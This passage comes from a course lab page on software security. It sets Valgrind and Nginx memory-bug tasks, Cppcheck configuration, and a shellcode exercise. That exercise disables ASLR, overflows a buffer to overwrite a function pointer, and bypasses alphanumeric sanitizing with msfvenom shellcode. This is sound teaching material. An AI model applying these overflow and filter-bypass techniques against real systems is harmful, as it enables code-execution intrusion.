Another well-known static analysis tool, used for detecting bugs and possible vulnerabilities, is [[http://www.coverity.com/|Coverity]]. Open source projects may be checked using [[https://scan.coverity.com/|Coverity Scan]] for free; all one needs to do is create an account. Coverity Scan is integrated with GitHub.

===== Tasks =====

==== Valgrind warm-up exercise ====

Download the following {{:session:session13_task1.tgz|archive}}. Compile the C source file contained within with gcc and use Valgrind to detect the possible memory errors. After detecting the errors, try to find the incorrect lines of code causing them and fix the problems. 

==== Hunting memory errors in Nginx ====

Download the following {{:session:nginx-1.7.3-sss.tgz|archive}} containing a modified version of the Nginx web server. Compile the Nginx web server and install it somewhere local. Start by configuring the build with an installation prefix:<code>
./configure --prefix=/path/to/your/installation/folder
</code>
where ''/path/to/your/installation/folder'' is a path of your choice for installing ''nginx''. Then build and install with ''make'' and ''make install''.

You can start the webserver by issuing the following command from the installation folder you've chosen:
<code bash>
./sbin/nginx
</code>

If you can't find the executable in the installation folder, you may issue the command below inside the installation folder:<code>
find . -name nginx
</code>

The server can be stopped by issuing:
<code bash>
./sbin/nginx -s stop
</code>

You may also want to run the server under Valgrind and have it follow the child processes the server spawns (see Valgrind's ''%%--trace-children=yes%%'' option). After starting it up, send a few HTTP requests to it to see what the problem might be. If you want to issue a lot of HTTP requests, you may want to try the ''httperf'' tool.

As done in the previous exercise, try to pinpoint the memory problem using Valgrind and then resolve it.
<note info>You may need to delve a bit into the nginx code and understand how it manages memory before attempting a fix.</note>

==== Shellcode, Sanitizing and Alphanumeric Shellcode ====

Use {{:session:shellcode-validation.zip|this archive}} for this task. Use ''make'' to create the ''show-banner-message'' executable file. In this task, you should disable ASLR:<code>
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
</code>

First, use a suitable command line argument and value inside the ''banner.txt'' file to inject and run a binary shellcode. You may use [[http://shell-storm.org/shellcode/files/shellcode-250.php|this shellcode]] (you may ignore the ''setreuid'' part of the shellcode).

Second, assume the ''banner.c'' program is part of a library you don't have access to. Use input sanitizing of the ''message'' buffer in the ''show-banner-message.c'' program to prevent the running of a binary shellcode; i.e. make sure all characters are alphanumeric or ''NUL'', otherwise exit.

Third, use an alphanumeric shellcode in the ''message'' buffer to run the shellcode and bypass the preventive measure above. Inspect the assembly code of ''show-banner-message'' and use a suitable buffer register for ''msfvenom'' in order to obtain a completely alphanumeric shellcode. See what register stores the pointer to the ''message'' buffer before calling ''print_fn''.

<note tip>
The idea is to fill the ''banner'' buffer with ''36'' bytes such that the last ''4'' bytes would overwrite the ''print_fn'' global variable with an address we want to store the shellcode at. When ''print_fn'' gets called, our shellcode will be executed.

The shellcode will be passed as a byte array as an argument to the program. It will be stored in the ''message'' local variable. The address of the ''message'' local variable will be used as the address to overwrite the ''print_fn'' global function pointer, as stated above.
</note>

==== Static Analysis with Cppcheck ====

Use {{:session:checkme.zip|this archive}} for the task. Use ''make'' to create the ''checkme'' executable file.

Look through the source file. It consists of a function ''my_tokenize'', which is called from the main program multiple times. Run a basic ''cppcheck'' check on it.

Write a library configuration file that specifies that ''my_tokenize'''s first argument must be non-null and its second argument must have values between ''0'' and ''1024''. Use the [[http://cppcheck.sourceforge.net/manual.pdf|manual]] as a reference (''section 7: Library configuration'').

Run ''cppcheck'' again and tell it to load the newly created library file.


=== Extra: io.smashthestack.org ===

Go through the first 6 levels of the [[http://io.smashthestack.org/|io.smashthestack.org wargame]]. If you feel up to it, solve the ''_alt'' versions of the challenges as well.

===== References =====
 * [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|Details of Memcheck's checking machinery]]